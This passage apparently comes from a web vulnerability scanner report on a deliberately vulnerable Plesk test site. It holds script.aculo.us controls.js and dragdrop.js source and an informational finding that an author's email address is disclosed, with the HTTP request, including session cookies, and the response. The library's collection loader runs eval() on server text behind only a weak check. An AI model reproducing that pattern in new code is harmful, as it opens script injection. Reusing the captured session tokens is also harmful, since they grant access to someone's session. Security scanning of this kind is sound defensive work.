var options = Object.extend({ method: 'get' }, this.options.ajaxOptions);
Object.extend(options, {
parameters: params,
onComplete: this._boundWrapperHandler,
onFailure: this._boundFailureHandler
});
new Ajax.Request(this.url, options);
}
if (e) Event.stop(e);
},
leaveEditMode: function() {
this.element.removeClassName(this.options.savingClassName);
this.removeForm();
this.leaveHover();
this.element.style.backgroundColor = this._originalBackground;
this.element.show();
if (this.options.externalControl)
this.options.externalControl.show();
this._saving = false;
this._editing = false;
this._oldInnerHTML = null;
this.triggerCallback('onLeaveEditMode');
},
leaveHover: function(e) {
if (this.options.hoverClassName)
this.element.removeClassName(this.options.hoverClassName);
if (this._saving) return;
this.triggerCallback('onLeaveHover');
},
loadExternalText: function() {
this._form.addClassName(this.options.loadingClassName);
this._controls.editor.disabled = true;
var options = Object.extend({ method: 'get' }, this.options.ajaxOptions);
Object.extend(options, {
parameters: 'editorId=' + encodeURIComponent(this.element.id),
onComplete: Prototype.emptyFunction,
onSuccess: function(transport) {
this._form.removeClassName(this.options.loadingClassName);
var text = transport.responseText;
if (this.options.stripLoadedTextTags)
text = text.stripTags();
this._controls.editor.value = text;
this._controls.editor.disabled = false;
this.postProcessEditField();
}.bind(this),
onFailure: this._boundFailureHandler
});
new Ajax.Request(this.options.loadTextURL, options);
},
postProcessEditField: function() {
var fpc = this.options.fieldPostCreation;
if (fpc)
$(this._controls.editor)['focus' == fpc ? 'focus' : 'activate']();
},
prepareOptions: function() {
this.options = Object.clone(Ajax.InPlaceEditor.DefaultOptions);
Object.extend(this.options, Ajax.InPlaceEditor.DefaultCallbacks);
[this._extraDefaultOptions].flatten().compact().each(function(defs) {
Object.extend(this.options, defs);
}.bind(this));
},
prepareSubmission: function() {
this._saving = true;
this.removeForm();
this.leaveHover();
this.showSaving();
},
registerListeners: function() {
this._listeners = { };
var listener;
$H(Ajax.InPlaceEditor.Listeners).each(function(pair) {
listener = this[pair.value].bind(this);
this._listeners[pair.key] = listener;
if (!this.options.externalControlOnly)
this.element.observe(pair.key, listener);
if (this.options.externalControl)
this.options.externalControl.observe(pair.key, listener);
}.bind(this));
},
removeForm: function() {
if (!this._form) return;
this._form.remove();
this._form = null;
this._controls = { };
},
showSaving: function() {
this._oldInnerHTML = this.element.innerHTML;
this.element.innerHTML = this.options.savingText;
this.element.addClassName(this.options.savingClassName);
this.element.style.backgroundColor = this._originalBackground;
this.element.show();
},
triggerCallback: function(cbName, arg) {
if ('function' == typeof this.options[cbName]) {
this.options[cbName](this, arg);
}
},
unregisterListeners: function() {
$H(this._listeners).each(function(pair) {
if (!this.options.externalControlOnly)
this.element.stopObserving(pair.key, pair.value);
if (this.options.externalControl)
this.options.externalControl.stopObserving(pair.key, pair.value);
}.bind(this));
},
wrapUp: function(transport) {
this.leaveEditMode();
// Can't use triggerCallback due to backward compatibility: requires
// binding + direct element
this._boundComplete(transport, this.element);
}
});

Object.extend(Ajax.InPlaceEditor.prototype, {
dispose: Ajax.InPlaceEditor.prototype.destroy
});

Ajax.InPlaceCollectionEditor = Class.create(Ajax.InPlaceEditor, {
initialize: function($super, element, url, options) {
this._extraDefaultOptions = Ajax.InPlaceCollectionEditor.DefaultOptions;
$super(element, url, options);
},

createEditField: function() {
var list = document.createElement('select');
list.name = this.options.paramName;
list.size = 1;
this._controls.editor = list;
this._collection = this.options.collection || [];
if (this.options.loadCollectionURL)
this.loadCollection();
else
this.checkForExternalText();
this._form.appendChild(this._controls.editor);
},

loadCollection: function() {
this._form.addClassName(this.options.loadingClassName);
this.showLoadingText(this.options.loadingCollectionText);
var options = Object.extend({ method: 'get' }, this.options.ajaxOptions);
Object.extend(options, {
parameters: 'editorId=' + encodeURIComponent(this.element.id),
onComplete: Prototype.emptyFunction,
onSuccess: function(transport) {
var js = transport.responseText.strip();
if (!/^\[.*\]$/.test(js)) // TODO: improve sanity check
throw 'Server returned an invalid collection representation.';
this._collection = eval(js);
this.checkForExternalText();
}.bind(this),
onFailure: this.onFailure
});
new Ajax.Request(this.options.loadCollectionURL, options);
},

showLoadingText: function(text) {
this._controls.editor.disabled = true;
var tempOption = this._controls.editor.firstChild;
if (!tempOption) {
tempOption = document.createElement('option');
tempOption.value = '';
this._controls.editor.appendChild(tempOption);
tempOption.selected = true;
}
tempOption.update((text || '').stripScripts().stripTags());
},

checkForExternalText: function() {
this._text = this.getText();
if (this.options.loadTextURL)
this.loadExternalText();
else
this.buildOptionList();
},

loadExternalText: function() {
this.showLoadingText(this.options.loadingText);
var options = Object.extend({ method: 'get' }, this.options.ajaxOptions);
Object.extend(options, {
parameters: 'editorId=' + encodeURIComponent(this.element.id),
onComplete: Prototype.emptyFunction,
onSuccess: function(transport) {
this._text = transport.responseText.strip();
this.buildOptionList();
}.bind(this),
onFailure: this.onFailure
});
new Ajax.Request(this.options.loadTextURL, options);
},

buildOptionList: function() {
this._form.removeClassName(this.options.loadingClassName);
this._collection = this._collection.map(function(entry) {
return 2 === entry.length ? entry : [entry, entry].flatten();
});
var marker = ('value' in this.options) ? this.options.value : this._text;
var textFound = this._collection.any(function(entry) {
return entry[0] == marker;
}.bind(this));
this._controls.editor.update('');
var option;
this._collection.each(function(entry, index) {
option = document.createElement('option');
option.value = entry[0];
option.selected = textFound ? entry[0] == marker : 0 == index;
option.appendChild(document.createTextNode(entry[1]));
this._controls.editor.appendChild(option);
}.bind(this));
this._controls.editor.disabled = false;
Field.scrollFreeActivate(this._controls.editor);
}
});

//**** DEPRECATION LAYER FOR InPlace[Collection]Editor! ****
//**** This only exists for a while, in order to let ****
//**** users adapt to the new API. Read up on the new ****
//**** API and convert your code to it ASAP! ****

Ajax.InPlaceEditor.prototype.initialize.dealWithDeprecatedOptions = function(options) {
if (!options) return;
function fallback(name, expr) {
if (name in options || expr === undefined) return;
options[name] = expr;
};
fallback('cancelControl', (options.cancelLink ? 'link' : (options.cancelButton ? 'button' :
options.cancelLink == options.cancelButton == false ? false : undefined)));
fallback('okControl', (options.okLink ? 'link' : (options.okButton ? 'button' :
options.okLink == options.okButton == false ? false : undefined)));
fallback('highlightColor', options.highlightcolor);
fallback('highlightEndColor', options.highlightendcolor);
};

Object.extend(Ajax.InPlaceEditor, {
DefaultOptions: {
ajaxOptions: { },
autoRows: 3, // Use when multi-line w/ rows == 1
cancelControl: 'link', // 'link'|'button'|false
cancelText: 'cancel',
clickToEditText: 'Click to edit',
externalControl: null, // id|elt
externalControlOnly: false,
fieldPostCreation: 'activate', // 'activate'|'focus'|false
formClassName: 'inplaceeditor-form',
formId: null, // id|elt
highlightColor: '#ffff99',
highlightEndColor: '#ffffff',
hoverClassName: '',
htmlResponse: true,
loadingClassName: 'inplaceeditor-loading',
loadingText: 'Loading...',
okControl: 'button', // 'link'|'button'|false
okText: 'ok',
paramName: 'value',
rows: 1, // If 1 and multi-line, uses autoRows
savingClassName: 'inplaceeditor-saving',
savingText: 'Saving...',
size: 0,
stripLoadedTextTags: false,
submitOnBlur: false,
textAfterControls: '',
textBeforeControls: '',
textBetweenControls: ''
},
DefaultCallbacks: {
callback: function(form) {
return Form.serialize(form);
},
onComplete: function(transport, element) {
// For backward compatibility, this one is bound to the IPE, and passes
// the element directly. It was too often customized, so we don't break it.
new Effect.Highlight(element, {
startcolor: this.options.highlightColor, keepBackgroundImage: true });
},
onEnterEditMode: null,
onEnterHover: function(ipe) {
ipe.element.style.backgroundColor = ipe.options.highlightColor;
if (ipe._effect)
ipe._effect.cancel();
},
onFailure: function(transport, ipe) {
alert('Error communication with the server: ' + transport.responseText.stripTags());
},
onFormCustomization: null, // Takes the IPE and its generated form, after editor, before controls.
onLeaveEditMode: null,
onLeaveHover: function(ipe) {
ipe._effect = new Effect.Highlight(ipe.element, {
startcolor: ipe.options.highlightColor, endcolor: ipe.options.highlightEndColor,
restorecolor: ipe._originalBackground, keepBackgroundImage: true
});
}
},
Listeners: {
click: 'enterEditMode',
keydown: 'checkForEscapeOrReturn',
mouseover: 'enterHover',
mouseout: 'leaveHover'
}
});

Ajax.InPlaceCollectionEditor.DefaultOptions = {
loadingCollectionText: 'Loading options...'
};

// Delayed observer, like Form.Element.Observer,
// but waits for delay after last key input
// Ideal for live-search fields

Form.Element.DelayedObserver = Class.create({
initialize: function(element, delay, callback) {
this.delay = delay || 0.5;
this.element = $(element);
this.callback = callback;
this.timer = null;
this.lastValue = $F(this.element);
Event.observe(this.element,'keyup',this.delayedListener.bindAsEventListener(this));
},
delayedListener: function(event) {
if(this.lastValue == $F(this.element)) return;
if(this.timer) clearTimeout(this.timer);
this.timer = setTimeout(this.onTimerEvent.bind(this), this.delay * 1000);
this.lastValue = $F(this.element);
},
onTimerEvent: function() {
this.timer = null;
this.callback(this.element, $F(this.element));
}
});

7.5. http://vulnerarable.plesk.smb.10.2.0.site:2006/js/externals/scriptaculous/dragdrop.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://vulnerarable.plesk.smb.10.2.0.site:2006
Path:	/js/externals/scriptaculous/dragdrop.js

Issue detail

The following email address was disclosed in the response:

sammi@oriontransfer.co.nz

Request

GET /js/externals/scriptaculous/dragdrop.js?1.8.0 HTTP/1.1
Accept: */*
Referer: http://vulnerarable.plesk.smb.10.2.0.site:2006/Wizard/Edit/Html?currentPageId=q485ez4jvyq
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: vulnerarable.plesk.smb.10.2.0.site:2006
Proxy-Connection: Keep-Alive
Cookie: PHPSESSID=10321169792bce25daa15603ea9ba645; sessionID=ratyxspkfhncnbudbnjoxfoj; PLESKSESSID=10321169792bce25daa15603ea9ba645; locale=en-US; SessionID=42b54cb11fc3aedbd; psaContext=domains

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Wed, 11 Jun 2008 15:03:52 GMT
Accept-Ranges: bytes
ETag: "0bc2c5cd4cbc81:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 02:07:57 GMT
Content-Length: 31605

// script.aculo.us dragdrop.js v1.8.0, Tue Nov 06 15:01:40 +0300 2007

// Copyright (c) 2005-2007 Thomas Fuchs (http://script.aculo.us, http://mir.aculo.us)
// (c) 2005-2007 Sammi Williams (http://www.oriontransfer.co.nz, sammi@oriontransfer.co.nz)
//
// script.aculo.us is freely distributable under the terms of an MIT-style license.
// For details, see the script.aculo.us web site: http://script.aculo.us/

if(Object.isUndefined(Effect))
throw("dragdrop.js requires including script.aculo.us' effects.js library");

var Droppables = {
drops: [],

remove: function(element) {
this.drops = this.drops.reject(function(d) { return d.element==$(element) });
},

add: function(element) {
element = $(element);
var options = Object.extend({
greedy: true,
hoverclass: null,
tree: false
}, arguments[1] || { });

// cache containers
if(options.containment) {
options._containers = [];
var containment = options.containment;
if(Object.isArray(containment)) {
containment.each( function(c) { options._containers.push($(c)) });
} else {
options._containers.push($(containment));
}
}

if(options.accept) options.accept = [options.accept].flatten();

Element.makePositioned(element); // fix IE
options.element = element;

this.drops.push(options);
},

findDeepestChild: function(drops) {
deepest = drops[0];

for (i = 1; i < drops.length; ++i)
if (Element.isParent(drops[i].element, deepest.element))
deepest = drops[i];

return deepest;
},

isContained: function(element, drop) {
var containmentNode;
if(drop.tree) {
containmentNode = element.treeNode;
} else {
containmentNode = element.parentNode;
}
return drop._containers.detect(function(c) { return containmentNode == c });
},

isAffected: function(point, element, drop) {
return (
(drop.element!=element) &&
((!drop._containers) ||
this.isContained(element, drop)) &&
((!drop.accept) ||
(Element.classNames(element).detect(
function(v) { return drop.accept.include(v) } ) )) &&
Position.within(drop.element, point[0], point[1]) );
},

deactivate: function(drop) {
if(drop.hoverclass)
Element.removeClassName(drop.element, drop.hoverclass);
this.last_active = null;
},

activate: function(drop) {
if(drop.hoverclass)
Element.addClassName(drop.element, drop.hoverclass);
this.last_active = drop;
},

show: function(point, element) {
if(!this.drops.length) return;
var drop, affected = [];

this.drops.each( function(drop) {
if(Droppables.isAffected(point, element, drop))
affected.push(drop);
});

if(affected.length>0)
drop = Droppables.findDeepestChild(affected);

if(this.last_active && this.last_active != drop) this.deactivate(this.last_active);
if (drop) {
Position.within(drop.element, point[0], point[1]);
if(drop.onHover)
drop.onHover(element, drop.element, Position.overlap(drop.overlap, drop.element));

if (drop != this.last_active) Droppables.activate(drop);
}
},

fire: function(event, element) {
if(!this.last_active) return;
Position.prepare();

if (this.isAffected([Event.pointerX(event), Event.pointerY(event)], element, this.last_active))
if (this.last_active.onDrop) {
this.last_active.onDrop(element, this.last_active.element, event);
return true;
}
},

reset: function() {
if(this.last_active)
this.deactivate(this.last_active);
}
}

var Draggables = {
drags: [],
observers: [],

register: function(draggable) {
if(this.drags.length == 0) {
this.eventMouseUp = this.endDrag.bindAsEventListener(this);
this.eventMouseMove = this.updateDrag.bindAsEventListener(this);
this.eventKeypress = this.keyPress.bindAsEventListener(this);

Event.observe(document, "mouseup", this.eventMouseUp);
Event.observe(document, "mousemove", this.eventMouseMove);
Event.observe(document, "keypress", this.eventKeypress);
}
this.drags.push(draggable);
},

unregister: function(draggable) {
this.drags = this.drags.reject(function(d) { return d==draggable });
if(this.drags.length == 0) {
Event.stopObserving(document, "mouseup", this.eventMouseUp);
Event.stopObserving(document, "mousemove", this.eventMouseMove);
Event.stopObserving(document, "keypress", this.eventKeypress);
}
},

activate: function(draggable) {
if(draggable.options.delay) {
this._timeout = setTimeout(function() {
Draggables._timeout = null;
window.focus();
Draggables.activeDraggable = draggable;
}.bind(this), draggable.options.delay);
} else {
window.focus(); // allows keypress events if window isn't currently focused, fails for Safari
this.activeDraggable = draggable;
}
},

deactivate: function() {
this.activeDraggable = null;
},

updateDrag: function(event) {
if(!this.activeDraggable) return;
var pointer = [Event.pointerX(event), Event.pointerY(event)];
// Mozilla-based browsers fire successive mousemove events with
// the same coordinates, prevent needless redrawing (moz bug?)
if(this._lastPointer && (this._lastPointer.inspect() == pointer.inspect())) return;
this._lastPointer = pointer;

this.activeDraggable.updateDrag(event, pointer);
},

endDrag: function(event) {
if(this._timeout) {
clearTimeout(this._timeout);
this._timeout = null;
}
if(!this.activeDraggable) return;
this._lastPointer = null;
this.activeDraggable.endDrag(event);
this.activeDraggable = null;
},

keyPress: function(event) {
if(this.activeDraggable)
this.activeDraggable.keyPress(event);
},

addObserver: function(observer) {
this.observers.push(observer);
this._cacheObserverCallbacks();
},

removeObserver: function(element) { // element instead of observer fixes mem leaks
this.observers = this.observers.reject( function(o) { return o.element==element });
this._cacheObserverCallbacks();
},

notify: function(eventName, draggable, event) { // 'onStart', 'onEnd', 'onDrag'
if(this[eventName+'Count'] > 0)
this.observers.each( function(o) {
if(o[eventName]) o[eventName](eventName, draggable, event);
});
if(draggable.options[eventName]) draggable.options[eventName](draggable, event);
},

_cacheObserverCallbacks: function() {
['onStart','onEnd','onDrag'].each( function(eventName) {
Draggables[eventName+'Count'] = Draggables.observers.select(
function(o) { return o[eventName]; }
).length;
});
}
}

/*--------------------------------------------------------------------------*/

var Draggable = Class.create({
initialize: function(element) {
var defaults = {
handle: false,
reverteffect: function(element, top_offset, left_offset) {
var dur = Math.sqrt(Math.abs(top_offset^2)+Math.abs(left_offset^2))*0.02;
new Effect.Move(element, { x: -left_offset, y: -top_offset, duration: dur,
queue: {scope:'_draggable', position:'end'}
});
},
endeffect: function(element) {
var toOpacity = Object.isNumber(element._opacity) ? element._opacity : 1.0;
new Effect.Opacity(element, {duration:0.2, from:0.7, to:toOpacity,
queue: {scope:'_draggable', position:'end'},
afterFinish: function(){
Draggable._dragging[element] = false
}
});
},
zindex: 1000,
revert: false,
quiet: false,
scroll: false,
scrollSensitivity: 20,
scrollSpeed: 15,
snap: false, // false, or xy or [x,y] or function(x,y){ return [x,y] }
delay: 0
};

if(!arguments[1] || Object.isUndefined(arguments[1].endeffect))
Object.extend(defaults, {
starteffect: function(element) {
element._opacity = Element.getOpacity(element);
Draggable._dragging[element] = true;
new Effect.Opacity(element, {duration:0.2, from:element._opacity, to:0.7});
}
});

var options = Object.extend(defaults, arguments[1] || { });

this.element = $(element);

if(options.handle && Object.isString(options.handle))
this.handle = this.element.down('.'+options.handle, 0);

if(!this.handle) this.handle = $(options.handle);
if(!this.handle) this.handle = this.element;

if(options.scroll && !options.scroll.scrollTo && !options.scroll.outerHTML) {
options.scroll = $(options.scroll);
this._isScrollChild = Element.childOf(this.element, options.scroll);
}

Element.makePositioned(this.element); // fix IE

this.options = options;
this.dragging = false;

this.eventMouseDown = this.initDrag.bindAsEventListener(this);
Event.observe(this.handle, "mousedown", this.eventMouseDown);

Draggables.register(this);
},

destroy: function() {
Event.stopObserving(this.handle, "mousedown", this.eventMouseDown);
Draggables.unregister(this);
},

currentDelta: function() {
return([
parseInt(Element.getStyle(this.element,'left') || '0'),
parseInt(Element.getStyle(this.element,'top') || '0')]);
},

initDrag: function(event) {
if(!Object.isUndefined(Draggable._dragging[this.element]) &&
Draggable._dragging[this.element]) return;
if(Event.isLeftClick(event)) {
// abort on form elements, fixes a Firefox issue
var src = Event.element(event);
if((tag_name = src.tagName.toUpperCase()) && (
tag_name=='INPUT' ||
tag_name=='SELECT' ||
tag_name=='OPTION' ||
tag_name=='BUTTON' ||
tag_name=='TEXTAREA')) return;

var pointer = [Event.pointerX(event), Event.pointerY(event)];
var pos = Position.cumulativeOffset(this.element);
this.offset = [0,1].map( function(i) { return (pointer[i] - pos[i]) });

Draggables.activate(this);
Event.stop(event);
}
},

startDrag: function(event) {
this.dragging = true;
if(!this.delta)
this.delta = this.currentDelta();

if(this.options.zindex) {
this.originalZ = parseInt(Element.getStyle(this.element,'z-index') || 0);
this.element.style.zIndex = this.options.zindex;
}

if(this.options.ghosting) {
this._clone = this.element.cloneNode(true);
this.element._originallyAbsolute = (this.element.getStyle('position') == 'absolute');
if (!this.element._originallyAbsolute)
Position.absolutize(this.element);
this.element.parentNode.insertBefore(this._clone, this.element);
}

if(this.options.scroll) {
if (this.options.scroll == window) {
var where = this._getWindowScroll(this.options.scroll);
this.originalScrollLeft = where.left;
this.originalScrollTop = where.top;
} else {
this.originalScrollLeft = this.options.scroll.scrollLeft;
this.originalScrollTop = this.options.scroll.scrollTop;
}
}

Draggables.notify('onStart', this, event);

if(this.options.starteffect) this.options.starteffect(this.element);
},

updateDrag: function(event, pointer) {
if(!this.dragging) this.startDrag(event);

if(!this.options.quiet){
Position.prepare();
Droppables.show(pointer, this.element);
}

Draggables.notify('onDrag', this, event);

this.draw(pointer);
if(this.options.change) this.options.change(this);

if(this.options.scroll) {
this.stopScrolling();

var p;
if (this.options.scroll == window) {
with(this._getWindowScroll(this.options.scroll)) { p = [ left, top, left+width, top+height ]; }
} else {
p = Position.page(this.options.scroll);
p[0] += this.options.scroll.scrollLeft + Position.deltaX;
p[1] += this.options.scroll.scrollTop + Position.deltaY;
p.push(p[0]+this.options.scroll.offsetWidth);
p.push(p[1]+this.options.scroll.offsetHeight);
}
var speed = [0,0];
if(pointer[0] < (p[0]+this.options.scrollSensitivity)) speed[0] = pointer[0]-(p[0]+this.options.scrollSensitivity);
if(pointer[1] < (p[1]+this.options.scrollSensitivity)) speed[1] = pointer[1]-(p[1]+this.options.scrollSensitivity);
if(pointer[0] > (p[2]-this.options.scrollSensitivity)) speed[0] = pointer[0]-(p[2]-this.options.scrollSensitivity);
if(pointer[1] > (p[3]-this.options.scrollSensitivity)) speed[1] = pointer[1]-(p[3]-this.options.scrollSensitivity);
this.startScrolling(speed);
}

// fix AppleWebKit rendering
if(Prototype.Browser.WebKit) window.scrollBy(0,0);

Event.stop(event);
},

finishDrag: function(event, success) {
this.dragging = false;

if(this.options.quiet){
Position.prepare();
var pointer = [Event.pointerX(event), Event.pointerY(event)];
Droppables.show(pointer, this.element);
}

if(this.options.ghosting) {
if (!this.element._originallyAbsolute)
Position.relativize(this.element);
delete this.element._originallyAbsolute;
Element.remove(this._clone);
this._clone = null;
}

var dropped = false;
if(success) {
dropped = Droppables.fire(event, this.element);
if (!dropped) dropped = false;
}
if(dropped && this.options.onDropped) this.options.onDropped(this.element);
Draggables.notify('onEnd', this, event);

var revert = this.options.revert;
if(revert && Object.isFunction(revert)) revert = revert(this.element);

var d = this.currentDelta();
if(revert && this.options.reverteffect) {
if (dropped == 0 || revert != 'failure')
this.options.reverteffect(this.element,
d[1]-this.delta[1], d[0]-this.delta[0]);
} else {
this.delta = d;
}

if(this.options.zindex)
this.element.style.zIndex = this.originalZ;

if(this.options.endeffect)
this.options.endeffect(this.element);

Draggables.deactivate(this);
Droppables.reset();
},

keyPress: function(event) {
if(event.keyCode!=Event.KEY_ESC) return;
this.finishDrag(event, false);
Event.stop(event);
},

endDrag: function(event) {
if(!this.dragging) return;
this.stopScrolling();
this.finishDrag(event, true);
Event.stop(event);
},

draw: function(point) {
var pos = Position.cumulativeOffset(this.element);
if(this.options.ghosting) {
var r = Position.realOffset(this.element);
pos[0] += r[0] - Position.deltaX; pos[1] += r[1] - Position.deltaY;
}

var d = this.currentDelta();
pos[0] -= d[0]; pos[1] -= d[1];

if(this.options.scroll && (this.options.scroll != window && this._isScrollChild)) {
pos[0] -= this.options.scroll.scrollLeft-this.originalScrollLeft;
pos[1] -= this.options.scroll.scrollTop-this.originalScrollTop;
}

var p = [0,1].map(function(i){
return (point[i]-pos[i]-this.offset[i])
}.bind(this));

if(this.options.snap) {
if(Object.isFunction(this.options.snap)) {
p = this.options.snap(p[0],p[1],this);
} else {
if(Object.isArray(this.options.snap)) {
p = p.map( function(v, i) {
return (v/this.options.snap[i]).round()*this.options.snap[i] }.bind(this))
} else {
p = p.map( function(v) {
return (v/this.options.snap).round()*this.options.snap }.bind(this))
}
}}

var style = this.element.style;
if((!this.options.constraint) || (this.options.constraint=='horizontal'))
style.left = p[0] + "px";
if((!this.options.constraint) || (this.options.constraint=='vertical'))
style.top = p[1] + "px";

if(style.visibility=="hidden") style.visibility = ""; // fix gecko rendering
},

stopScrolling: function() {
if(this.scrollInterval) {
clearInterval(this.scrollInterval);
this.scrollInterval = null;
Draggables._lastScrollPointer = null;
}
},

startScrolling: function(speed) {
if(!(speed[0] || speed[1])) return;
this.scrollSpeed = [speed[0]*this.options.scrollSpeed,speed[1]*this.options.scrollSpeed];
this.lastScrolled = new Date();
this.scrollInterval = setInterval(this.scroll.bind(this), 10);
},

scroll: function() {
var current = new Date();
var delta = current - this.lastScrolled;
this.lastScrolled = current;
if(this.options.scroll == window) {
with (this._getWindowScroll(this.options.scroll)) {
if (this.scrollSpeed[0] || this.scrollSpeed[1]) {
var d = delta / 1000;
this.options.scroll.scrollTo( left + d*this.scrollSpeed[0], top + d*this.scrollSpeed[1] );
}
}
} else {
this.options.scroll.scrollLeft += this.scrollSpeed[0] * delta / 1000;
this.options.scroll.scrollTop += this.scrollSpeed[1] * delta / 1000;
}

Position.prepare();
Droppables.show(Draggables._lastPointer, this.element);
Draggables.notify('onDrag', this);
if (this._isScrollChild) {
Draggables._lastScrollPointer = Draggables._lastScrollPointer || $A(Draggables._lastPointer);
Draggables._lastScrollPointer[0] += this.scrollSpeed[0] * delta / 1000;
Draggables._lastScrollPointer[1] += this.scrollSpeed[1] * delta / 1000;
if (Draggables._lastScrollPointer[0] < 0)
Draggables._lastScrollPointer[0] = 0;
if (Draggables._lastScrollPointer[1] < 0)
Draggables._lastScrollPointer[1] = 0;
this.draw(Draggables._lastScrollPointer);
}

if(this.options.change) this.options.change(this);
},

_getWindowScroll: function(w) {
var T, L, W, H;
with (w.document) {
if (w.document.documentElement && documentElement.scrollTop) {
T = documentElement.scrollTop;
L = documentElement.scrollLeft;
} else if (w.document.body) {
T = body.scrollTop;
L = body.scrollLeft;
}
if (w.innerWidth) {
W = w.innerWidth;
H = w.innerHeight;
} else if (w.document.documentElement && documentElement.clientWidth) {
W = documentElement.clientWidth;
H = documentElement.clientHeight;
} else {
W = body.offsetWidth;
H = body.offsetHeight
}
}
return { top: T, left: L, width: W, height: H };
}
});

Draggable._dragging = { };

/*--------------------------------------------------------------------------*/

var SortableObserver = Class.create({
initialize: function(element, observer) {
this.element = $(element);
this.observer = observer;
this.lastValue = Sortable.serialize(this.element);
},

onStart: function() {
this.lastValue = Sortable.serialize(this.element);
},

onEnd: function() {
Sortable.unmark();
if(this.lastValue != Sortable.serialize(this.element))
this.observer(this.element)
}
});

var Sortable = {
SERIALIZE_RULE: /^[^_\-](?:[A-Za-z0-9\-\_]*)[_](.*)$/,

sortables: { },

_findRootElement: function(element) {
while (element.tagName.toUpperCase() != "BODY") {
if(element.id && Sortable.sortables[element.id]) return element;
element = element.parentNode;
}
},

options: function(element) {
element = Sortable._findRootElement($(element));
if(!element) return;
return Sortable.sortables[element.id];
},

destroy: function(element){
var s = Sortable.options(element);

if(s) {
Draggables.removeObserver(s.element);
s.droppables.each(function(d){ Droppables.remove(d) });
s.draggables.invoke('destroy');

delete Sortable.sortables[s.element.id];
}
},

create: function(element) {
element = $(element);
var options = Object.extend({
element: element,
tag: 'li', // assumes li children, override with tag: 'tagname'
dropOnEmpty: false,
tree: false,
treeTag: 'ul',
overlap: 'vertical', // one of 'vertical', 'horizontal'
constraint: 'vertical', // one of 'vertical', 'horizontal', false
containment: element, // also takes array of elements (or id's); or false
handle: false, // or a CSS class
only: false,
delay: 0,
hoverclass: null,
ghosting: false,
quiet: false,
scroll: false,
scrollSensitivity: 20,
scrollSpeed: 15,
format: this.SERIALIZE_RULE,

// these take arrays of elements or ids and can be
// used for better initialization performance
elements: false,
handles: false,

onChange: Prototype.emptyFunction,
onUpdate: Prototype.emptyFunction
}, arguments[1] || { });

// clear any old sortable with same element
this.destroy(element);

// build options for the draggables
var options_for_draggable = {
revert: true,
quiet: options.quiet,
scroll: options.scroll,
scrollSpeed: options.scrollSpeed,
scrollSensitivity: options.scrollSensitivity,
delay: options.delay,
ghosting: options.ghosting,
constraint: options.constraint,
handle: options.handle };

if(options.starteffect)
options_for_draggable.starteffect = options.starteffect;

if(options.reverteffect)
options_for_draggable.reverteffect = options.reverteffect;
else
if(options.ghosting) options_for_draggable.reverteffect = function(element) {
element.style.top = 0;
element.style.left = 0;
};

if(options.endeffect)
options_for_draggable.endeffect = options.endeffect;

if(options.zindex)
options_for_draggable.zindex = options.zindex;

// build options for the droppables
var options_for_droppable = {
overlap: options.overlap,
containment: options.containment,
tree: options.tree,
hoverclass: options.hoverclass,
onHover: Sortable.onHover
}

var options_for_tree = {
onHover: Sortable.onEmptyHover,
overlap: options.overlap,
containment: options.containment,
hoverclass: options.hoverclass
}

// fix for gecko engine
Element.cleanWhitespace(element);

options.draggables = [];
options.droppables = [];

// drop on empty handling
if(options.dropOnEmpty || options.tree) {
Droppables.add(element, options_for_tree);
options.droppables.push(element);
}

(options.elements || this.findElements(element, options) || []).each( function(e,i) {
var handle = options.handles ? $(options.handles[i]) :
(options.handle ? $(e).select('.' + options.handle)[0] : e);
options.draggables.push(
new Draggable(e, Object.extend(options_for_draggable, { handle: handle })));
Droppables.add(e, options_for_droppable);
if(options.tree) e.treeNode = element;
options.droppables.push(e);
});

if(options.tree) {
(Sortable.findTreeElements(element, options) || []).each( function(e) {
Droppables.add(e, options_for_tree);
e.treeNode = element;
options.droppables.push(e);
});
}

// keep reference
this.sortables[element.id] = options;

// for onupdate
Draggables.addObserver(new SortableObserver(element, options.onUpdate));

},

// return all suitable-for-sortable elements in a guaranteed order
findElements: function(element, options) {
return Element.findChildren(
element, options.only, options.tree ? true : false, options.tag);
},

findTreeElements: function(element, options) {
return Element.findChildren(
element, options.only, options.tree ? true : false, options.treeTag);
},

onHover: function(element, dropon, overlap) {
if(Element.isParent(dropon, element)) return;

if(overlap > .33 && overlap < .66 && Sortable.options(dropon).tree) {
return;
} else if(overlap>0.5) {
Sortable.mark(dropon, 'before');
if(dropon.previousSibling != element) {
var oldParentNode = element.parentNode;
element.style.visibility = "hidden"; // fix gecko rendering
dropon.parentNode.insertBefore(element, dropon);
if(dropon.parentNode!=oldParentNode)
Sortable.options(oldParentNode).onChange(element);
Sortable.options(dropon.parentNode).onChange(element);
}
} else {
Sortable.mark(dropon, 'after');
var nextElement = dropon.nextSibling || null;
if(nextElement != element) {
var oldParentNode = element.parentNode;
element.style.visibility = "hidden"; // fix gecko rendering
dropon.parentNode.insertBefore(element, nextElement);
if(dropon.parentNode!=oldParentNode)
Sortable.options(oldParentNode).onChange(element);
Sortable.options(dropon.parentNode).onChange(element);
}
}
},

onEmptyHover: function(element, dropon, overlap) {
var oldParentNode = element.parentNode;
var droponOptions = Sortable.options(dropon);

if(!Element.isParent(dropon, element)) {
var index;

var children = Sortable.findElements(dropon, {tag: droponOptions.tag, only: droponOptions.only});
var child = null;

if(children) {
var offset = Element.offsetSize(dropon, droponOptions.overlap) * (1.0 - overlap);

for (index = 0; index < children.length; index += 1) {
if (offset - Element.offsetSize (children[index], droponOptions.overlap) >= 0) {
offset -= Element.offsetSize (children[index], droponOptions.overlap);
} else if (offset - (Element.offsetSize (children[index], droponOptions.overlap) / 2) >= 0) {
child = index + 1 < children.length ? children[index + 1] : null;
break;
} else {
child = children[index];
break;
}
}
}

dropon.insertBefore(element, child);

Sortable.options(oldParentNode).onChange(element);
droponOptions.onChange(element);
}
},

unmark: function() {
if(Sortable._marker) Sortable._marker.hide();
},

mark: function(dropon, position) {
// mark on ghosting only
var sortable = Sortable.options(dropon.parentNode);
if(sortable && !sortable.ghosting) return;

if(!Sortable._marker) {
Sortable._marker =
($('dropmarker') || Element.extend(document.createElement('DIV'))).
hide().addClassName('dropmarker').setStyle({position:'absolute'});
